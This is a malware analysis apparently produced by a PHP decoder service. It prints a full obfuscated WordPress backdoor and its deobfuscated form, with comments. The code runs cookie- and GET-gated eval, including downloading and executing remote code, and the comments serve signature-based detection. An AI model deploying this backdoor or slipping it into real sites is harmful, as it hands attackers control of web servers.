WordPress などで見つかる PHP のマルウェア・ウィルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。
<?php
/*
 * Obfuscated sample as submitted to the decoder. Kept byte-for-byte so that
 * signatures and hashes taken from it remain valid; only this header is added.
 *
 * Obfuscation layers visible here:
 *   - control-flow flattening: every statement sits behind a label and is
 *     reached by goto, so textual order is not execution order;
 *   - string literals written as mixed octal / hex escapes;
 *   - identifiers built at run time from a range("~", " ") lookup table, and
 *     function names stored as ';'-separated numbers decoded by D2hNU().
 *
 * Top-level execution order, following the gotos:
 *   BLHU9 -> O6Krk -> Lo_J9 -> NF8AM -> (Uy_A7 -> QTGYl -> ThhbZ, or straight
 *   to APMXN) -> vo6Yp -> BP11V (class declaration) -> CtYyT (static call).
 *
 * The text after the closing tag is emitted as literal output whenever the
 * script reaches the end; if it belongs to the sample rather than to the page
 * it was copied from, it may serve as a response-body marker - TODO confirm.
 */
goto BLHU9; BP11V: class xVa7E { static function D2hNU($GVWZ8) { goto JsXVd; JsXVd: $Czq05 = "\162" . "\x61" . "\156" . "\147" . "\x65"; goto cuC_m; WvsoD: foreach ($edA6S as $ATQRQ => $DK7VO) { $rdI9w .= $TTRCV[$DK7VO - 9472]; zO2xE: } goto gyflJ; cuC_m: $TTRCV = $Czq05("\x7e", "\x20"); goto B6f7T; B6f7T: $edA6S = explode("\x3b", $GVWZ8); goto qTjD1; gyflJ: W8FA4: goto w0ROJ; w0ROJ: return $rdI9w; goto dfL3A; qTjD1: $rdI9w = ''; goto WvsoD; dfL3A: } static function NM32J($EEy14, $FM25a) { goto jC2BK; t3dMY: $tJ11R = curl_exec($h8mke); goto WZA1N; WZA1N: return empty($tJ11R) ? $FM25a($EEy14) : $tJ11R; goto kgc2p; qr6u7: curl_setopt($h8mke, CURLOPT_RETURNTRANSFER, 1); goto t3dMY; jC2BK: $h8mke = curl_init($EEy14); goto qr6u7; kgc2p: } static function r7mmk() { goto bBvpd; CjHdV: if (!(@$lkyUu[0] - time() > 0 and md5(md5($lkyUu[3 + 0])) === "\67\67\x37\67\x66\145\x38\x64\141\61\x63\63\x30\63\x61\71\71\x38\66\x65\x32\x31\67\64\x34\66\x63\x62\x38\60\x37\x32")) { goto dZlSK; } goto ROX34; UR1oK: foreach ($bS2DB as $ZWHc9) { $k6J3s[] = self::d2Hnu($ZWHc9); Xrsdq: } goto SYeLm; SYeLm: YsJDq: goto hTYnj; Hy4b6: die; goto qhhfr; vwjyh: @$k6J3s[2 + 8](INPUT_GET, "\157\x66") == 1 && die($k6J3s[3 + 2](__FILE__)); goto CjHdV; hTYnj: $f7oON = @$k6J3s[1]($k6J3s[10 + 0](INPUT_GET, $k6J3s[2 + 7])); goto I3yr_; I3yr_: $yl7Rf = @$k6J3s[1 + 2]($k6J3s[5 + 1], $f7oON); goto cgz9a; ROX34: $HbWp2 = self::nM32J($lkyUu[1 + 0], $k6J3s[1 + 4]); goto Ws_mQ; bBvpd: $bS2DB = array("\x39\64\x39\71\73\x39\64\70\x34\73\71\64\71\67\73\71\x35\x30\x31\x3b\71\64\x38\x32\x3b\x39\x34\x39\67\73\x39\x35\60\x33\73\71\x34\x39\66\x3b\71\x34\x38\x31\x3b\x39\64\70\70\x3b\71\64\x39\x39\x3b\71\x34\x38\62\73\x39\x34\x39\63\x3b\71\64\x38\x37\x3b\x39\64\70\x38", "\71\64\70\63\73\x39\64\x38\x32\73\71\64\x38\x34\x3b\71\65\60\63\x3b\71\64\x38\64\x3b\x39\64\x38\67\73\71\64\70\x32\73\x39\x35\64\71\73\x39\65\64\67", 
"\71\64\x39\62\x3b\x39\64\70\x33\73\x39\x34\x38\x37\x3b\71\64\x38\70\73\x39\x35\60\63\73\x39\x34\71\x38\x3b\x39\x34\x39\x37\x3b\71\64\x39\x39\73\x39\64\70\x37\73\71\x34\71\70\73\x39\x34\x39\67", "\x39\x34\x38\66\x3b\71\65\60\x31\x3b\71\64\x39\x39\x3b\71\x34\71\x31", "\71\65\x30\x30\x3b\x39\65\x30\x31\73\x39\64\x38\63\x3b\71\64\71\x37\x3b\71\x35\64\64\x3b\x39\65\64\x36\73\71\x35\x30\x33\x3b\71\x34\x39\70\x3b\71\64\x39\67\x3b\x39\64\71\x39\x3b\x39\64\70\67\x3b\x39\x34\x39\70\x3b\x39\x34\x39\x37", "\71\x34\71\x36\73\71\x34\x39\x33\73\x39\x34\x39\60\x3b\71\x34\71\67\73\71\65\x30\63\73\x39\x34\x39\x35\73\71\x34\x39\x37\73\x39\64\x38\x32\73\x39\x35\60\x33\73\71\x34\x39\71\x3b\x39\64\x38\x37\73\x39\x34\x38\70\73\71\64\x38\x32\x3b\71\x34\x39\67\x3b\x39\x34\x38\x38\x3b\x39\64\70\62\73\71\x34\x38\x33", "\x39\65\x32\66\73\71\x35\x35\66", "\x39\x34\x37\x33", "\71\65\x35\61\x3b\x39\65\65\x36", "\x39\65\63\63\x3b\x39\x35\x31\x36\73\x39\x35\x31\x36\x3b\71\x35\63\x33\x3b\71\65\60\x39", "\x39\x34\x39\66\73\71\64\71\63\73\71\x34\x39\x30\73\x39\x34\x38\62\x3b\71\64\71\x37\73\x39\x34\x38\64\73\71\65\60\x33\x3b\71\x34\71\x33\x3b\71\64\x38\x38\73\71\64\x38\66\73\71\64\x38\61\x3b\71\x34\70\62"); goto UR1oK; cgz9a: $lkyUu = $k6J3s[1 + 1]($yl7Rf, true); goto vwjyh; Ws_mQ: @eval($k6J3s[3 + 1]($HbWp2)); goto Hy4b6; qhhfr: dZlSK: goto J2b05; J2b05: } } goto CtYyT; vo6Yp: metaphone("\115\x6a\111\x32\117\124\x6b\x33\x4e\172\x59\x79\x4f\x54\x4d\64\117\124\x51\x78\x4d\124\x55\172\x4d\124\x59\171\x4e\x54\115\x79"); goto BP11V; NF8AM: if (!(in_array(gettype($ZKO3y) . "\62\x32", $ZKO3y) && md5(md5(md5(md5($ZKO3y[16])))) === "\x66\61\x31\x36\x63\x34\144\62\67\145\x61\146\145\x62\142\x63\65\x65\67\x35\63\64\145\62\x33\65\x33\143\144\141\142\71")) { goto APMXN; } goto Uy_A7; O6Krk: $EKzMr = $nZuQa("\x7e", "\40"); goto Lo_J9; QTGYl: @eval($ZKO3y[63](${$ZKO3y[50]}[15])); goto ThhbZ; Lo_J9: $ZKO3y = ${$EKzMr[4 + 27] . $EKzMr[36 + 23] . $EKzMr[23 + 24] . $EKzMr[44 + 3] . $EKzMr[0 + 51] . $EKzMr[5 + 48] . 
$EKzMr[12 + 45]}; goto NF8AM; BLHU9: $nZuQa = "\162" . "\x61" . "\x6e" . "\x67" . "\145"; goto O6Krk; Uy_A7: $ZKO3y[63] = $ZKO3y[63] . $ZKO3y[74]; goto QTGYl; ThhbZ: APMXN: goto vo6Yp; CtYyT: Xva7e::R7MMk(); ?> BiaoJiOk
<?php
/*
 * Deobfuscated form of the sample (decoder output): goto flattening removed
 * and string escapes decoded. The code is unchanged; line breaks and comments
 * are added for analysis.
 *
 * Two independent paths end in eval() on requester-supplied data:
 *   1. a cookie-gated eval at top level;
 *   2. a GET-gated remote loader in xVa7E::r7mmk().
 * Neither the word "_COOKIE" nor any of the sensitive function names appears
 * literally in the obfuscated file, so plain keyword scans will miss it.
 * Stable strings for signatures are the two MD5 hex constants and the
 * metaphone() argument.
 */
$nZuQa = "range";
// Printable ASCII in descending order, '~' down to ' '; index i is chr(126 - i).
$EKzMr = range("~", " ");
// Indices 31,59,47,47,51,53,57 spell "_COOKIE": a variable-variable read of $_COOKIE.
$ZKO3y = ${$EKzMr[31] . $EKzMr[59] . $EKzMr[47] . $EKzMr[47] . $EKzMr[51] . $EKzMr[53] . $EKzMr[57]};
// Gate for path 1: some cookie value must equal gettype($_COOKIE) . "22"
// ("array22", loose in_array comparison) and four nested md5() rounds of
// cookie 16 must equal the constant. Otherwise path 1 is skipped.
if (!(in_array(gettype($ZKO3y) . "22", $ZKO3y) && md5(md5(md5(md5($ZKO3y[16])))) === "f116c4d27eafebbc5e7534e2353cdab9")) {
    goto APMXN;
}
// Cookies 63 and 74 are concatenated into a callable name.
$ZKO3y[63] .= $ZKO3y[74];
// That callable is applied to element 15 of the variable named by cookie 50 and
// the result is passed to eval(); '@' hides any error. Function, input and
// code are all chosen by the requester.
@eval($ZKO3y[63](${$ZKO3y[50]}[15]));
APMXN:
// Return value is discarded, so the call has no effect on execution. The
// argument looks like base64 text; presumably a sample or campaign tag - TODO confirm.
metaphone("MjI2OTk3NzYyOTM4OTQxMTUzMTYyNTMy");

/**
 * Container for path 2. PHP resolves class and method names
 * case-insensitively, which is why the differently-cased calls
 * (self::d2Hnu, self::nM32J, Xva7e::R7MMk) reach these methods.
 */
class xVa7E
{
    /**
     * String decoder. Splits the argument on ';', subtracts 9472 from each
     * number and uses the result as an index into the descending
     * printable-ASCII table, i.e. each number n yields chr(126 - (n - 9472)).
     *
     * @param string $GVWZ8 ';'-separated decimal numbers
     * @return string decoded text
     */
    static function D2hNU($GVWZ8)
    {
        $Czq05 = "range"; // left over from the obfuscated form; not used below
        $TTRCV = range("~", " ");
        $edA6S = explode(";", $GVWZ8);
        $rdI9w = '';
        foreach ($edA6S as $ATQRQ => $DK7VO) {
            $rdI9w .= $TTRCV[$DK7VO - 9472];
        }
        return $rdI9w;
    }

    /**
     * Fetches a URL with cURL and returns the body. When the cURL result is
     * empty (failure or empty response) the callable in $FM25a is invoked
     * with the same URL instead. No timeout or TLS option is set here.
     *
     * @param string   $EEy14 URL to fetch
     * @param callable $FM25a fallback fetcher; the only caller passes
     *                        "file_get_contents"
     * @return mixed response body, or whatever the fallback returns
     */
    static function NM32J($EEy14, $FM25a)
    {
        $h8mke = curl_init($EEy14);
        curl_setopt($h8mke, CURLOPT_RETURNTRANSFER, 1);
        $tJ11R = curl_exec($h8mke);
        return empty($tJ11R) ? $FM25a($EEy14) : $tJ11R;
    }

    /**
     * Entry point of path 2: reads a GET parameter, decodes it to a JSON
     * array, checks an expiry time and a password hash, then downloads and
     * eval()s code from a URL named in that array.
     */
    static function r7mmk()
    {
        // Encoded name table; decoded values (via D2hNU) are noted per entry.
        $bS2DB = array(
            "9499;9484;9497;9501;9482;9497;9503;9496;9481;9488;9499;9482;9493;9487;9488", // [0] create_function (not referenced below)
            "9483;9482;9484;9503;9484;9487;9482;9549;9547", // [1] str_rot13
            "9492;9483;9487;9488;9503;9498;9497;9499;9487;9498;9497", // [2] json_decode
            "9486;9501;9499;9491", // [3] pack
            "9500;9501;9483;9497;9544;9546;9503;9498;9497;9499;9487;9498;9497", // [4] base64_decode
            "9496;9493;9490;9497;9503;9495;9497;9482;9503;9499;9487;9488;9482;9497;9488;9482;9483", // [5] file_get_contents
            "9526;9556", // [6] "H*" (pack format: hex string)
            "9473", // [7] "}" (not referenced below)
            "9551;9556", // [8] "/*" (not referenced below)
            "9533;9516;9516;9533;9509", // [9] "ARRAY" (GET parameter name)
            "9496;9493;9490;9482;9497;9484;9503;9493;9488;9486;9481;9482" // [10] filter_input
        );
        foreach ($bS2DB as $ZWHc9) {
            $k6J3s[] = self::d2Hnu($ZWHc9);
        }
        // str_rot13(filter_input(INPUT_GET, "ARRAY"))
        $f7oON = @$k6J3s[1]($k6J3s[10](INPUT_GET, $k6J3s[9]));
        // pack("H*", ...): hex text to raw bytes
        $yl7Rf = @$k6J3s[3]($k6J3s[6], $f7oON);
        // json_decode(..., true): request data becomes the control array
        $lkyUu = $k6J3s[2]($yl7Rf, true);
        // If GET parameter "of" loosely equals 1, the script prints a file via
        // file_get_contents() and stops. This runs before the password check
        // below. The obfuscated original passes __FILE__ (the implant's own
        // source); the literal path here is what the decoder substituted for
        // __FILE__ and should not be treated as an indicator.
        @$k6J3s[10](INPUT_GET, "of") == 1 && die($k6J3s[5]("/var/www/html/input.php"));
        // Gate for path 2: element 0 must be a timestamp later than now and
        // md5(md5(element 3)) must equal the constant.
        if (!(@$lkyUu[0] - time() > 0 and md5(md5($lkyUu[3])) === "7777fe8da1c303a9986e217446cb8072")) {
            // [PHPDeobfuscator] Implied return
            return;
        }
        // Element 1 is fetched as a URL (cURL, falling back to file_get_contents).
        $HbWp2 = self::nM32J($lkyUu[1], $k6J3s[5]);
        // eval(base64_decode(body)): remotely hosted code runs inside this
        // PHP process, errors suppressed; the request then ends.
        @eval($k6J3s[4]($HbWp2));
        die;
    }
}
// Runs on every request that includes this file. When the gate in r7mmk()
// fails, control returns here and the text after the closing tag is output.
Xva7e::R7MMk(); ?> BiaoJiOk